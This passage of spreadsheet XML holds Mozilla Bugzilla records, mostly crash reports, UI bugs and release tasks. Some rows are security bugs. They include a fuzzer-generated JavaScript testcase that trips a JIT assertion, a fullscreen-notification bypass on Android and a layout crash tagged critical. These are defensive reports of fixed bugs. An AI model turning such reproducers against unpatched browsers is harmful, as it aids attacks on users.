      <c r="C5821" t="inlineStr">
        <is>
          <t>BP.com - dynamic menus use layers</t>
        </is>
      </c>
      <c r="D5821" t="inlineStr">
        <is>
          <t>2015-04-19 23:39:06 -0700</t>
        </is>
      </c>
      <c r="E5821" t="n">
        <v>1</v>
      </c>
      <c r="F5821" t="n">
        <v>1</v>
      </c>
      <c r="G5821" t="n">
        <v>6</v>
      </c>
      <c r="H5821" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5821" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J5821" t="inlineStr">
        <is>
          <t>English Other</t>
        </is>
      </c>
      <c r="K5821" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5821" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5821" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5821" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5821" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5821" t="inlineStr">
        <is>
          <t>[proprietary-html]</t>
        </is>
      </c>
      <c r="Q5821" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5821" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5821" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5821" t="n">
        <v>1</v>
      </c>
      <c r="U5821" t="n">
        <v>0</v>
      </c>
      <c r="V5821" t="n">
        <v>6</v>
      </c>
      <c r="W5821" t="inlineStr">
        <is>
          <t>URL: http://www.bp.com
'Our Company', 'Our Businesses', 'In Your Area' and 'Meeting Your Needs'
sections all are broken in build 2001-11-20-03, Windows 2000 due to:
Error: document.layers has no properties
Source File: http://www.bp.com/js/home/library.js
Line: 6
Error: document.layers has no properties
Source File: http://www.bp.com/js/home/library.js
Line: 7
Code snippet:
function
checkBrowser(){this.ver=navigator.appVersion;this.dom=document.getElementById?1:0;this.ie6=(this.ver.indexOf("MSIE
6")!=-1 &amp;&amp; this.dom)?1:0;this.ie5=(this.ver.indexOf("MSIE 5")&gt;-1 &amp;&amp;
this.dom)?1:0;this.ie4=(document.all &amp;&amp; !this.dom)?1:0;this.ns5=(this.dom &amp;&amp;
parseInt(this.ver) &gt;= 5) ?1:0;this.ns4=(document.layers &amp;&amp;
!this.dom)?1:0;this.bw=(this.ie6 || this.ie5 || this.ie4 || this.ns4 ||
this.ns5);this.ie4up=(this.ie6 || this.ie5 || this.ie4);this.ns4up=(this.ns4 ||
this.ns5);return this;};</t>
        </is>
      </c>
      <c r="X5821" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5822">
      <c r="A5822" t="n">
        <v>1712047</v>
      </c>
      <c r="B5822" t="inlineStr">
        <is>
          <t>2021-05-20 00:40:55 -0700</t>
        </is>
      </c>
      <c r="C5822" t="inlineStr">
        <is>
          <t>Crash in [@ sse41::lowp::gather_8888]</t>
        </is>
      </c>
      <c r="D5822" t="inlineStr">
        <is>
          <t>2021-11-22 23:45:48 -0800</t>
        </is>
      </c>
      <c r="E5822" t="n">
        <v>1</v>
      </c>
      <c r="F5822" t="n">
        <v>1</v>
      </c>
      <c r="G5822" t="n">
        <v>3</v>
      </c>
      <c r="H5822" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5822" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5822" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5822" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5822" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5822" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5822" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5822" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5822" t="inlineStr"/>
      <c r="Q5822" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5822" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5822" t="inlineStr">
        <is>
          <t>91 Branch</t>
        </is>
      </c>
      <c r="T5822" t="n">
        <v>1</v>
      </c>
      <c r="U5822" t="n">
        <v>0</v>
      </c>
      <c r="V5822" t="n">
        <v>24</v>
      </c>
      <c r="W5822" t="inlineStr">
        <is>
          <t>Crash report: https://crash-stats.mozilla.org/report/index/68d80abf-0878-437e-bd1e-6e79a0210520
Reason: ```EXCEPTION_ACCESS_VIOLATION_READ```
Top 10 frames of crashing thread:
```
0 xul.dll sse41::lowp::gather_8888 gfx/skia/skia/src/opts/SkRasterPipeline_opts.h:3780
1 xul.dll sse2::lowp::start_pipeline gfx/skia/skia/src/opts/SkRasterPipeline_opts.h:3141
2 xul.dll std::_Func_impl_no_alloc&lt;`lambda at /builds/worker/checkouts/gecko/gfx/skia/skia/src/core/SkRasterPipeline.cpp:355:12', void, unsigned int, unsigned int, unsigned int, unsigned int&gt;::_Do_call 
3 xul.dll SkRasterPipelineBlitter::blitRect gfx/skia/skia/src/core/SkRasterPipelineBlitter.cpp:298
4 xul.dll static SkScan::FillIRect gfx/skia/skia/src/core/SkScan.cpp:28
5 xul.dll static SkScan::FillRect gfx/skia/skia/src/core/SkScan.cpp:111
6 xul.dll SkDraw::drawRect const gfx/skia/skia/src/core/SkDraw.cpp:679
7 xul.dll SkBitmapDevice::drawRect gfx/skia/skia/src/core/SkBitmapDevice.cpp:365
8 xul.dll SkBitmapDevice::drawBitmapRect gfx/skia/skia/src/core/SkBitmapDevice.cpp:543
9 xul.dll SkBaseDevice::drawImageRect gfx/skia/skia/src/core/SkDevice.cpp:141
```
This signature started showing up in 89 beta 13</t>
        </is>
      </c>
      <c r="X5822" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5823">
      <c r="A5823" t="n">
        <v>1822298</v>
      </c>
      <c r="B5823" t="inlineStr">
        <is>
          <t>2023-03-14 06:18:19 -0700</t>
        </is>
      </c>
      <c r="C5823" t="inlineStr">
        <is>
          <t>Block the fullscreen notification on Android using download popups + keyboard + landscape</t>
        </is>
      </c>
      <c r="D5823" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:53 -0700</t>
        </is>
      </c>
      <c r="E5823" t="n">
        <v>1</v>
      </c>
      <c r="F5823" t="n">
        <v>1</v>
      </c>
      <c r="G5823" t="n">
        <v>2</v>
      </c>
      <c r="H5823" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5823" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J5823" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5823" t="inlineStr">
        <is>
          <t>Firefox 111</t>
        </is>
      </c>
      <c r="L5823" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5823" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5823" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5823" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5823" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5823" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5823" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5823" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T5823" t="n">
        <v>1</v>
      </c>
      <c r="U5823" t="n">
        <v>0</v>
      </c>
      <c r="V5823" t="n">
        <v>13</v>
      </c>
      <c r="W5823" t="inlineStr">
        <is>
          <t>Created attachment 9322967
fullscreen-bypass.html
Using a long download popup + keyboard, it is possible to push the fullscreen notification out of bounds on FF for Android.
STR
1. Go to landscape mode.
2. Click on input button in Firefox (tested on Nightly version)</t>
        </is>
      </c>
      <c r="X5823" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5824">
      <c r="A5824" t="n">
        <v>1823042</v>
      </c>
      <c r="B5824" t="inlineStr">
        <is>
          <t>2023-03-17 07:28:09 -0700</t>
        </is>
      </c>
      <c r="C5824" t="inlineStr">
        <is>
          <t>Assertion failure: cx-&gt;realm() == fun-&gt;realm(), at jit/VMFunctions.cpp:818</t>
        </is>
      </c>
      <c r="D5824" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:26 -0700</t>
        </is>
      </c>
      <c r="E5824" t="n">
        <v>1</v>
      </c>
      <c r="F5824" t="n">
        <v>1</v>
      </c>
      <c r="G5824" t="n">
        <v>3</v>
      </c>
      <c r="H5824" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5824" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5824" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5824" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5824" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5824" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5824" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5824" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5824" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q5824" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5824" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5824" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T5824" t="n">
        <v>1</v>
      </c>
      <c r="U5824" t="n">
        <v>0</v>
      </c>
      <c r="V5824" t="n">
        <v>14</v>
      </c>
      <c r="W5824" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 585fe519f14ca8f241370573a902fc6d53cf8ac6 the attached sample asserts in the js-shell when invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fuzzing-safe crash.js`.
Bisecting the issue points to commit 4969ce47f2d294700b97907f9a890cac6d57f5d8 related to bug 1819558.
```
const v1 = this.newGlobal(this, this, this, this, this);
with (v1) {
    const v3 = ("p").__proto__;
    function f4(a5) {
        Reflect.construct(f4.bind(v1, v1), Reflect);
        return v3; 
    }   
    v3[Symbol.search] = f4; 
    function f11(a12, a13) {
        a12.search(v3);
        return this;
    }   
    v3[Symbol.toPrimitive] = f11;
    v3.trimEnd();
}
```
```
#0  0x00005555588482b8 in js::jit::CreateThisFromIC (cx=0x7ffff7438300, callee=..., newTarget=..., rval=...) at /js/src/jit/VMFunctions.cpp:817
#1  0x00002d4d9f43dd6f in ?? ()
#2  0x00007ffffffd63e0 in ?? ()
#3  0x00007ffffffd63b0 in ?? ()
#4  0xfff9800000000000 in ?? ()
#5  0x0000555559973e40 in js::jit::vmFunctions ()
```</t>
        </is>
      </c>
      <c r="X5824" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5825">
      <c r="A5825" t="n">
        <v>893335</v>
      </c>
      <c r="B5825" t="inlineStr">
        <is>
          <t>2013-07-13 00:59:42 -0700</t>
        </is>
      </c>
      <c r="C5825" t="inlineStr">
        <is>
          <t>Even if app has rating, description still shows as "not yet rated"</t>
        </is>
      </c>
      <c r="D5825" t="inlineStr">
        <is>
          <t>2013-08-07 10:11:31 -0700</t>
        </is>
      </c>
      <c r="E5825" t="n">
        <v>1</v>
      </c>
      <c r="F5825" t="n">
        <v>1</v>
      </c>
      <c r="G5825" t="n">
        <v>6</v>
      </c>
      <c r="H5825" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5825" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5825" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K5825" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L5825" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5825" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5825" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5825" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5825" t="inlineStr"/>
      <c r="Q5825" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5825" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5825" t="inlineStr">
        <is>
          <t>2013-08-06</t>
        </is>
      </c>
      <c r="T5825" t="n">
        <v>1</v>
      </c>
      <c r="U5825" t="n">
        <v>0</v>
      </c>
      <c r="V5825" t="n">
        <v>4</v>
      </c>
      <c r="W5825" t="inlineStr">
        <is>
          <t>Created attachment 775108
screenshot 1
Even if the app has rating, the description still shows as "not yet rated". See screenshot.
Steps to reproduce:
1. Go to Marketplace app, go to Categories at the top, tap "Sports".
2. Scroll through the apps to see most of them as "not yet rated", but some of them have blue-coloured stars indicating a rating.</t>
        </is>
      </c>
      <c r="X5825" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5826">
      <c r="A5826" t="n">
        <v>744147</v>
      </c>
      <c r="B5826" t="inlineStr">
        <is>
          <t>2012-04-10 13:22:56 -0700</t>
        </is>
      </c>
      <c r="C5826" t="inlineStr">
        <is>
          <t>Tracking bug for build &amp; release of Thunderbird 12.0b5</t>
        </is>
      </c>
      <c r="D5826" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E5826" t="n">
        <v>1</v>
      </c>
      <c r="F5826" t="n">
        <v>1</v>
      </c>
      <c r="G5826" t="n">
        <v>5</v>
      </c>
      <c r="H5826" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5826" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5826" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K5826" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5826" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5826" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5826" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5826" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5826" t="inlineStr">
        <is>
          <t>[release]</t>
        </is>
      </c>
      <c r="Q5826" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5826" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5826" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5826" t="n">
        <v>1</v>
      </c>
      <c r="U5826" t="n">
        <v>0</v>
      </c>
      <c r="V5826" t="n">
        <v>4</v>
      </c>
      <c r="W5826" t="inlineStr">
        <is>
          <t>waiting for "go to build".</t>
        </is>
      </c>
      <c r="X5826" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5827">
      <c r="A5827" t="n">
        <v>667512</v>
      </c>
      <c r="B5827" t="inlineStr">
        <is>
          <t>2011-06-27 10:30:39 -0700</t>
        </is>
      </c>
      <c r="C5827" t="inlineStr">
        <is>
          <t>Crash [@ nsIFrame::PeekOffset] with removing br and table cell and pressing right arrow key</t>
        </is>
      </c>
      <c r="D5827" t="inlineStr">
        <is>
          <t>2012-03-08 13:57:02 -0800</t>
        </is>
      </c>
      <c r="E5827" t="n">
        <v>1</v>
      </c>
      <c r="F5827" t="n">
        <v>1</v>
      </c>
      <c r="G5827" t="n">
        <v>3</v>
      </c>
      <c r="H5827" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5827" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5827" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5827" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5827" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5827" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5827" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5827" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5827" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q5827" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5827" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5827" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T5827" t="n">
        <v>1</v>
      </c>
      <c r="U5827" t="n">
        <v>0</v>
      </c>
      <c r="V5827" t="n">
        <v>25</v>
      </c>
      <c r="W5827" t="inlineStr">
        <is>
          <t>Created attachment 542197
testcase
See testcase, which crashes current trunk build after pressing the right arrow key.
https://crash-stats.mozilla.com/report/index/9bc6ca38-beec-412b-bd06-161462110627
0 		@0x6c0070 	
1 	xul.dll 	nsIFrame::PeekOffset 	layout/generic/nsFrame.cpp:5598
2 	xul.dll 	nsFrameSelection::MoveCaret 	layout/generic/nsSelection.cpp:1240
3 	xul.dll 	nsFrameSelection::MoveCaret 	layout/generic/nsSelection.cpp:1105
4 	xul.dll 	nsFrameSelection::CharacterMove 	layout/generic/nsSelection.cpp:2191
5 	xul.dll 	PresShell::CharacterMove 	layout/base/nsPresShell.cpp:3150
6 	xul.dll 	nsSelectionMoveCommands::DoCommand 	editor/libeditor/base/nsEditorCommands.cpp:718
7 	xul.dll 	nsControllerCommandTable::DoCommand 	embedding/components/commandhandler/src/nsControllerCommandTable.cpp:191
8 	xul.dll 	nsBaseCommandController::DoCommand 	embedding/components/commandhandler/src/nsBaseCommandController.cpp:169
9 	xul.dll 	nsXBLPrototypeHandler::DispatchXBLCommand 	content/xbl/src/nsXBLPrototypeHandler.cpp:499
10 	xul.dll 	nsXBLPrototypeHandler::ExecuteHandler 	
11 	xul.dll 	nsXBLPrototypeHandler::ModifiersMatchMask 	content/xbl/src/nsXBLPrototypeHandler.cpp:1027
12 	xul.dll 	nsCOMPtr_base::assign_from_helper 	obj-firefox/xpcom/build/nsCOMPtr.cpp:152
13 	xul.dll 	nsCOMPtr&lt;nsIDOMElement&gt;::nsCOMPtr&lt;nsIDOMElement&gt; 	obj-firefox/dist/include/nsCOMPtr.h:644
14 	xul.dll 	nsXBLWindowKeyHandler::GetElement 	content/xbl/src/nsXBLWindowKeyHandler.cpp:589
15 	xul.dll 	nsCOMPtr_base::assign_with_AddRef 	obj-firefox/xpcom/build/nsCOMPtr.cpp:88
16 	xul.dll 	nsRefPtr&lt;nsIDOMEventListener&gt;::~nsRefPtr&lt;nsIDOMEventListener&gt; 	obj-firefox/dist/include/nsAutoPtr.h:969
17 	xul.dll 	nsHashtable::Get 	xpcom/ds/nsHashtable.cpp:246
18 	xul.dll 	nsXBLDocumentInfo::GetPrototypeBinding 	content/xbl/src/nsXBLDocumentInfo.cpp:545
19 	xul.dll 	nsXBLDocumentInfo::GetPrototypeBinding 	content/xbl/src/nsXBLDocumentInfo.cpp:545
20 	xul.dll 	nsXBLSpecialDocInfo::GetHandlers 	content/xbl/src/nsXBLWindowKeyHandler.cpp:153
21 	xul.dll 	nsXBLSpecialDocInfo::GetAllHandlers 	content/xbl/src/nsXBLWindowKeyHandler.cpp:173</t>
        </is>
      </c>
      <c r="X5827" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5828">
      <c r="A5828" t="n">
        <v>1390895</v>
      </c>
      <c r="B5828" t="inlineStr">
        <is>
          <t>2017-08-16 07:39:46 -0700</t>
        </is>
      </c>
      <c r="C5828" t="inlineStr">
        <is>
          <t>Learn more label is not highlighted</t>
        </is>
      </c>
      <c r="D5828" t="inlineStr">
        <is>
          <t>2017-08-22 07:17:38 -0700</t>
        </is>
      </c>
      <c r="E5828" t="n">
        <v>1</v>
      </c>
      <c r="F5828" t="n">
        <v>1</v>
      </c>
      <c r="G5828" t="n">
        <v>2</v>
      </c>
      <c r="H5828" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5828" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5828" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K5828" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L5828" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5828" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5828" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5828" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5828" t="inlineStr">
        <is>
          <t>[photon-preference]</t>
        </is>
      </c>
      <c r="Q5828" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5828" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5828" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T5828" t="n">
        <v>1</v>
      </c>
      <c r="U5828" t="n">
        <v>0</v>
      </c>
      <c r="V5828" t="n">
        <v>6</v>
      </c>
      <c r="W5828" t="inlineStr">
        <is>
          <t>[Affected versions]:
- Nightly 57.0a1 2017-08-16
[Affected platforms]:
- Win 10 64-bit
- Ubuntu 16.04 64-bit
- Mac OS X 10.12
[Steps to reproduce]:
1. Open about:preferences
2. On Search text field enter "Learn more"
[Expected result]:
- All "Learn more" links are highlighted
[Actual result]:
- "Learn more" link from Site Data section is not highlighted
[Regression range]:
This reproduces also on 55.0a1 2017-04-20 Nightly, right after Search in Preferences feature was introduced.</t>
        </is>
      </c>
      <c r="X5828" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5829">
      <c r="A5829" t="n">
        <v>1357800</v>
      </c>
      <c r="B5829" t="inlineStr">
        <is>
          <t>2017-04-19 09:08:24 -0700</t>
        </is>
      </c>
      <c r="C5829" t="inlineStr">
        <is>
          <t>The One-Off search buttons not visible in the search bar</t>
        </is>
      </c>
      <c r="D5829" t="inlineStr">
        <is>
          <t>2017-09-06 04:47:06 -0700</t>
        </is>
      </c>
      <c r="E5829" t="n">
        <v>1</v>
      </c>
      <c r="F5829" t="n">
        <v>1</v>
      </c>
      <c r="G5829" t="n">
        <v>2</v>
      </c>
      <c r="H5829" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5829" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5829" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K5829" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5829" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5829" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5829" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5829" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q5829" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5829" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5829" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5829" t="n">
        <v>1</v>
      </c>
      <c r="U5829" t="n">
        <v>0</v>
      </c>
      <c r="V5829" t="n">
        <v>33</v>
      </c>
      <c r="W5829" t="inlineStr">
        <is>
          <t>Created attachment 8859636
OneOffsButtons.png
[Affected versions]:
- Nightly 55.0a1 - Build ID: 20170419100228
[Affected platforms]:
- Linux
[Steps to reproduce]:
1. Launch Firefox with a new profile
2. Open the Add-ons Manager
3. Enable the Compact Dark team
4. Type something in the Search Bar (look at the one-off search buttons)
5. Enable the Default team 
6. Double click in the Search Bar (look at the one-offs search buttons)
[Expected result]:
- In step 6, the second row of the one-off search buttons is properly displayed
[Actual result]:
- In step 6, the second row of the one-off search buttons is white. Hovering the mouse over the second row repaints it. Please see the screenshot for more details.</t>
        </is>
      </c>
      <c r="X5829" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5830">
      <c r="A5830" t="n">
        <v>634409</v>
      </c>
      <c r="B5830" t="inlineStr">
        <is>
          <t>2011-02-15 14:28:13 -0800</t>
        </is>
      </c>
      <c r="C5830" t="inlineStr">
        <is>
          <t>re-enable build1 to build2 updates for 3.6.14 on betatest channel</t>
        </is>
      </c>
      <c r="D5830" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5830" t="n">
        <v>1</v>
      </c>
      <c r="F5830" t="n">
        <v>1</v>
      </c>
      <c r="G5830" t="n">
        <v>5</v>
      </c>
      <c r="H5830" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5830" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5830" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5830" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5830" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5830" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5830" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5830" t="inlineStr"/>
      <c r="Q5830" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5830" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5830" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5830" t="n">
        <v>1</v>
      </c>
      <c r="U5830" t="n">
        <v>0</v>
      </c>
      <c r="V5830" t="n">
        <v>4</v>
      </c>
      <c r="W5830" t="inlineStr">
        <is>
          <t>They got disabled on bug 634371.</t>
        </is>
      </c>
      <c r="X5830" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5831">
      <c r="A5831" t="n">
        <v>1166529</v>
      </c>
      <c r="B5831" t="inlineStr">
        <is>
          <t>2015-05-19 15:42:14 -0700</t>
        </is>
      </c>
      <c r="C5831" t="inlineStr">
        <is>
          <t>Unused api_columns variable in report list</t>
        </is>
      </c>
      <c r="D5831" t="inlineStr">
        <is>
          <t>2015-05-27 10:12:12 -0700</t>
        </is>
      </c>
      <c r="E5831" t="n">
        <v>1</v>
      </c>
      <c r="F5831" t="n">
        <v>1</v>
      </c>
      <c r="G5831" t="n">
        <v>4</v>
      </c>
      <c r="H5831" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5831" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5831" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5831" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5831" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5831" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5831" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5831" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5831" t="inlineStr"/>
      <c r="Q5831" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5831" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5831" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5831" t="n">
        <v>1</v>
      </c>
      <c r="U5831" t="n">
        <v>0</v>
      </c>
      <c r="V5831" t="n">
        <v>3</v>
      </c>
      <c r="W5831" t="inlineStr">
        <is>
          <t>This was introduced in https://github.com/mozilla/socorro/commit/86c42363ce7026f4b093b9b245326d6f6fe32940
The variables are not used for anything.</t>
        </is>
      </c>
      <c r="X5831" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5832">
      <c r="A5832" t="n">
        <v>1451625</v>
      </c>
      <c r="B5832" t="inlineStr">
        <is>
          <t>2018-04-05 01:02:05 -0700</t>
        </is>
      </c>
      <c r="C5832" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::XULDocument::LoadOverlayInternal</t>
        </is>
      </c>
      <c r="D5832" t="inlineStr">
        <is>
          <t>2018-04-17 14:57:51 -0700</t>
        </is>
      </c>
      <c r="E5832" t="n">
        <v>1</v>
      </c>
      <c r="F5832" t="n">
        <v>1</v>
      </c>
      <c r="G5832" t="n">
        <v>3</v>
      </c>
      <c r="H5832" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5832" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
